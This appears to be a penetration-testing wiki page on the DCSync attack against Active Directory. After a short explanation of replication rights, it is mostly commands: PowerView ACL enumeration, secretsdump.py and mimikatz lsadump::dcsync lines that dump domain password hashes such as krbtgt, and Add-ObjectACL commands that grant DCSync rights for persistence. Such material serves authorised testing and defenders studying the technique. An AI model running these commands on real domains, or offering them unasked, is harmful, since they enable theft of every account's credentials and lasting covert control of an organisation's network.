DC Synchronization

Last updated 4 months ago

Was this helpful?

DC Synchronization

The DCSync attack simulates the behavior of a Domain Controller and asks other Domain Controllers to replicate information using the Directory Replication Service Remote Protocol (MS-DRSR). Because MS-DRSR is a valid and necessary function of Active Directory, it cannot be turned off or disabled. By default only Domain Admins, Enterprise Admins, Administrators, and Domain Controllers groups have the required privileges (Replicating Directory Changes, Replicating Directory Changes All and Replicating Directory Changes in Filtered Set).

Enumeration

With PowerView (a script and there are two versions: and ) enumerate for users with the required rights.

Get-ObjectAcl -DistinguishedName "DC=Security,DC=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')}

Get-ObjectACL "DC=security,DC=local" -ResolveGUIDs | ? {($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ObjectAceType -match 'Replication-Get')}

Get-ObjectAcl -DistinguishedName "DC=Security,DC=local" -ResolveGUIDs | ?{($_.IdentityReference -match "<USER>") -and (($_.ObjectType -match 'replication') -or ($_.ActiveDirectoryRights -match 'GenericAll'))}

We can take the individual SID's and attempt to identify the related User Principal Names (UPN's).

Get-ObjectAcl -Identity "dc=security,dc=local" -ResolveGUIDs | ? {$_.SecurityIdentifier -match "<SID>"

wmic useraccount get name,sid

Attack

Linux

With .

secretsdump.py -just-dc <Domain>/<User>:<Password>@<IP> -outputfile dcsync_hashes

[-just-dc-user <USERNAME>] # To get only of that user
[-hashes <NTLM_HASH>] # To access with hash
[-pwd-last-set] # To see when each account's password was last changed
[-just-dc-ntlm] # Only NTLM hash
[-user-status] # check if a user is disabled
[-history] # To dump password history, may be helpful for offline password cracking

Windows

With

lsadump::dcsync /domain:<Domain> /user:<Users-Hash-To-Dump>

lsadump::dcsync /user:krbtgt
lsadump::dcsync /domain:security.local /user:new_admin
lsadump::dcsync /user:security\krbtgt

Persistance

Add-ObjectACL -TargetDistinguishedName "DC=Security,DC=local" -PrincipalSamAccountName 'user' -Rights DCSync

Add-ObjectACL -PrincipalIdentity <USER> -Rights DCSync

Check

Get-ObjectAcl -DistinguishedName "DC=Security,DC=local" -ResolveGUIDs | ?{$_.IdentityReference -match "user"}